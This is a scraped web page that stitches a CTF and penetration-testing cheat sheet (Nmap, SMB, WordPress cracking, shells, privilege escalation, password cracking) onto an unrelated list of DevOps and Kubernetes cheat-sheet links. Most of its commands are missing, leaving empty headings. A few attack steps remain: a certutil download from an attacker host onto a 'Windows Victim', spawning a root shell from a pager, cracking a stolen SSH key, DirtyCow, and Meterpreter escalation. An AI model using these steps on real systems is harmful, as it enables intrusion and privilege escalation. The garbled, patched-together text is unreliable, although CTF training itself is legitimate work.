Mysql Cheat Sheet Github

System Hacking

File Hacking Extract hidden text from PDF Files. If something is hidden on a pdf which we need to find, we can Press Ctrl + A to copy everything on the pdf and paste on notepad. If nothing is found, we can use Inkspace tool to paste the pdf and try to ungroup several times to extract any hidden flag. Else solve using pdf-uncompress tools like qpdf to convert compressed data to redeable format. GitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.

Nmap Scanning

To scan for systems and Open Services/Ports, Use Nmap.

To scan for Vulnerabilities on system.

To scan for all ports, SYN Scan and OS detection.

To scan using inbuilt nmap scripts.

Netdiscover Scanning

To passively discover machines on the network, Use Netdiscover.

Nikto Scanning

To scan for vulnerabilities use Nikto.

WebServer is Open

If Port 80 or 443 is open, we can look for robots.txt to check for hidden flags or clues.

To find the Webserver version, Use Curl tool.

SMB is Open

If SMB has misconfigured anonymous login, Use smbclient to list shares.

If SMB Ports are open, we can look for anonymous login to mount misconfigured shares.

If we found Administrator Credentials for SMB, Access the root shell using this method.

To Extract and Mount VHD Drive Files

To search for Exploits on Metasploit by Name

Wordpress Open

If /wp-login.php is found in the Enumeration scanning, it can be Wordpress site.

To crack the login credentials for Wordpress, Use Hydra. We can use Burpsuite to capture the request parameters

To scan Wordpress site for Vulnerabilities.

To get a reverse shell using Admin Upload.

RPC Open

If RPC is open, we can login using rpclient.

Powershell

To bypass execution policy

Web Hacking

Five Stages of Web Hacking

Enumeration and Reconnaissance Tools

Whois, Nslookup, Dnsrecon, Google Fu, Dig - To passively enumerate website.
Sublist3r - Subdomains enumeration tool.
crt.sh - Certificate enumeration tool.
Hunter.io - Email enumeration tool.
Nmap, Wappalyzer, Whatweb, Builtwith, Netcat - Fingerprinting tools.
HaveIbeenPwned - Useful for breach enumeraton.
Use SecurityHeaders to find some misconfigured header information on target website.
Use Zap Proxy tool to extract hidden files/directories.
Clear Text Passwords Link

To gather information from online sources.

Scanning

Ping Sweep a network.

SYN Scan with Speed of 4 and port of common 1000 TCP.

All Port scan with All Scanning including OS, Version, Script and Traceroute.

To scan for UDP Ports (Dont scan all scans, as it takes lot of time).

Payloads

Non Staged Payload Example.

Staged Payload Example.

Shells

To use bind shell, we have to follow two steps: 1, Create a Bind Shell 2,Listen for connection.

BufferOverflow

To generate shellcode quickly, we can use python pwn library.

Gobuster with Cookie (Useful to directory traversal when cookie is needed )

SQLMAP

Redirect the HTTP Request to Burpsuite and we can see the request like this.

Now Right click and click on copy to file option.

File Hacking

Extract hidden text from PDF Files

If something is hidden on a pdf which we need to find, we can Press Ctrl + A to copy everything on the pdf and paste on notepad.If nothing is found, we can use Inkspace tool to paste the pdf and try to ungroup several times to extract any hidden flag.Else solve using pdf-uncompress tools like qpdf to convert compressed data to redeable format.

Compress File Extraction

If there is PK at the start of the file in the magic bytes, its most probably ZIP File.

To extract data from recursive zip file.

Extract hidden strings

If file is having some hidden text, we can use hexeditor or strings commands to locate the flag.

If hidden text has at the end, it is base64 encoded.

To monitor the appplication calls of a binary.

To track all Application & library calls of a program.

Cryptography

Caesar Cipher

If there is word caesar in the question or hint, it can be a substitution cipher.

If you find ! in the cipher text and cipher seems to be within certain range of Letters and appears to be transposition of a plain text, Use this website Ceasar Box to Bruteforce the hidden message.

Vigenere Cipher

To break Vigenere ciphers without knowing the key.

Use this website Link - Bruteforce solver.

One Time Pad Cipher

To solve One Time Pad, Use OTP.

Forensics

Image File

Try file comamnd on the image to learn more information.

To extract data inside Image files.

To check for metadata of the Image files.

To search for particular string or flag in an Image file.

To extract data hidden inside an image file protected with password.

Binwalk

Binwalk helps to find data inside the image or sometimes if binwalk reports as zip Archive, we can rename the file to .zip to find interesting data.

Extract NTFS Filesystem

To extract ntfs file system on Linux.

Recover Files from Deleted File Systems

To Recover Files from Deleted File Systems from Remote Hosts.

Packet Capture

If usb keys are mapped with pcap, we can use this Article to extract usb keys entered: Link

JavaScript Deobfuscator

To Deobfuscate JavaScript, use Jsnice.

Password Cracking

JOHN the ripper

If there is JOHN in the title or text or hint, its mostly reference to JOHN the ripper for bruteforce passwords/hashes.

To crack well known hashes, use Link

SAM Hashes

To get System User Hashes, we can follow this method.

Linux User Hashes

If we able to extract /etc/passwd and /etc/shadow file we can use unshadow

Hashcat

To crack the password, we can use hashcat here 500 is for format $1$ Replace it accordingly.

Privilige Escalation

Standard Scripts for Enumeration

Linux Priv Checker - Linux Privilige Enumeration Checker.
Pspy - Gather information on cron, proceses.
Gtfobins - If we dont exactly remember how to use a given setuid command to get Privliges.

Dirtycow

On older linux kernals, we can gain root access using dirtycow exploit.

To Use DirtyCow : Link - Maybe more specifically : Dirty.c

Sudo

To check what sudo command can the current user run with no-password.

Examples:

We can try like below

Gain More Privilige on windows system

In meterpreter shell try getsystem
In meterpreter shell try background and then follow rest of commands.
search suggester
If worked fine, else Try follow rest of commands.
Use this link: FuzzySec Win Priv Exec
Use this method: Sherlock
If current process doesnt own Privs, use migrate <PID> to get more Priviliges in Meterpretor.

To get Shell on Windows use Unicorn

MYSQL with Sudo Privilage

To get Shell from MYSQL

VIM Editor with Sudo Privilage

To get Shell from VIM.

Method-1:

Method-2:

Cronjob

If some system cron is getting some url present in the file, we can replace url to get flag as below.

To monitor cronjobs, we can tail the syslogs.

More or Less Command

If any file we found in low priv user and it contains something like this, we can execute it and minimize the size of terminal to enter the visual mode and enter !/bin/bash to get root shell.

Improve Shell

To get the better Shell after taking control of the system.

Transfer Files from Host to Target Machine

Use python -m SimpleHTTPServer in the host folder.
Use Apache and put files in /var/www/html/ folder.
If Tomcat is Opened, upload the file/payload using the Admin panel.
If wordpress is running, upload the file as plugin.
In Windows Victim, use certutil -urlcache -f http://<HOST_IP>/<FILE_NAME> <OUTPUT_FILE_NAME>

Tools

Reconnoitre

Security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.

Link
Total Commander - multi purpose terminal for Hacking. Link : www.ghisler.com
CTF Exploitation Framework : GitHub.com/Gallopsled/pwntools pip install pwntools
When using GDB, we can create “~/.gdbinit” file and add this line “set disassembly-flavor intel” to make intel synatx.
Dirbuster for enumeration web server Attacks.
Gobuster - Used for advanced enumeration.
7z Password Cracking: Use tool 7z2john
SSH Password Cracking: /usr/share/john/ssh2john.py id_rsa > output.hash

Documentation Browser for Software Developers
Git and GitHub Cheat Sheets
Linux Command Cheat Sheets
OpenShift Cheat Sheets

Cheat Sheets¶

wizardzines.com 🌟 programming zines by Julia Evans
Red Hat Developer cheat sheets 🌟 Browse through our collection of cheat sheets to help you develop with Red Hat products, which you can download for free as a Red Hat Developer member. You’ll find handy guides on a range of the latest developer tools and technologies, including Kubernetes, microservices, containers, and more.

AWS Cheat Sheets¶

API Cheatsheets¶

eBooks¶

Red Hat Developer eBooks 🌟 Browse through our collection of eBooks to help you develop with Red Hat products, which you can download for free as a Red Hat Developer member. You’ll find handy books on a range of the latest developer tools and technologies, including Kubernetes, microservices, containers, and more.
Transformation takes practice Our experts understand this: When it comes to your unique business challenges, one size does not fit all. We can guide you through exercises and tools, like the ones within the Open Practice Library, that are right for where you are, right now.

Mysql Cheat Sheet Github Examples

Documentation Browser for Software Developers¶

Dash for MacOS (paid)¶

Dash for MacOS Dash gives your Mac instant offline access to 200+ API documentation sets.

Velocity (Windows, paid)¶

Velocity Velocity gives your Windows desktop offline access to over 150 API documentation sets

Zeal (Windows, Linux, Free)¶

Zeal Zeal is an offline documentation browser for software developers.

Kubernetes Knowledge Hubs and Glossary¶

k8sref.io 🌟 Kubernetes Reference
Kubernetes Research. Research documents on node instance types, managed services, ingress controllers, CNIs, etc. 🌟 A research hub to collect all knowledge around Kubernetes. Those are in-depth reports and comparisons designed to drive your decisions. Should you use GKE, AKS, EKS? How many nodes? What instance type?
Kubernetes Reference: dev-k8sref-io.web.app 🌟 Imports paths are not always easy to find for a resource. Get some help from this doc.

Kubectl Cheat Sheets¶

opensource.com: 9 kubectl commands sysadmins need to know 🌟 Keep these 9 critical kubectl commands handy to help you with troubleshooting and managing your Kubernetes cluster administration.
medium: Awesome Kubernetes Command-Line Hacks Tips for you to kubectl like a pro
github: K8s in 30 mins 🌟 This is not a comprehensive guide to learn Kubernetes from scratch, rather this is just a small guide/cheat sheet to quickly setup and run applications with Kubernetes and deploy a very simple application on single workload VM. This repo can be served as quick learning manual to understand Kubernetes.
kunchalavikram1427: kubernetes Public
betterprogramming.pub: Awesome Kubernetes Command-Line Hacks Tips for you to kubectl like a pro

Docker Cheat Sheets¶

Git and GitHub Cheat Sheets¶

rogerdudler.github.io: git - the simple guide 🌟 Just a simple guide for getting started with git. no deep shit ;)

Git Flow Cheat Sheets¶

Sourcetree Cheat Sheet¶

GitKraken Git Cheat¶

Ansible Cheat Sheets¶

Ansible k8s cheat sheet 🌟 The Ansible k8s module enables you to manage Kubernetes objects with Ansible playbooks.

Packer and Terraform Cheat Sheets¶

Linux Command Cheat Sheets¶

SSH Cheat Sheets¶

OpenShift Cheat Sheets¶

Debezium Cheat Sheets¶

developers.redhat.com: Debezium on OpenShift Cheat Sheet Debezium is a distributed open-source platform for change data capture. Start it up, point it at your databases, and your apps can start responding to all of the inserts, updates, and deletes that other apps commit to your databases. Debezium is durable and fast, so your apps can respond quickly and never miss an event, even when things go wrong. This cheat sheet covers how to deploy/create/run/update a Debezium Connector on OpenShift.

Kubernetes Operator Cheat Sheets¶

Kubernetes POD Cheat Sheets¶

Buildah Cheat Sheets¶

Helm Cheat Sheets¶

Maven Cheat Sheets¶

Gradle Cheat Sheets¶

Eclipse MicroProfile¶

Jenkins Cheat Sheets¶

edureka.co: Jenkins Cheat Sheet 🌟

JMeter Cheat Sheets¶

Groovy Templates Cheat Sheet for JMeter Need help with your Groovy templates? Check out this cheat sheet to help you get started with scripting in Apache JMeter.
martkos-it.co.uk: JMeter Cheat Sheet This jmeter cheat sheet provides gentle reminders of the usage of jmeter gui/non-gui. It includes installation/execution, plugins, shortcut keys and functions and variables.

Quarkus Cheat Sheets¶

Markdown Cheat Sheets¶

markdownguide.org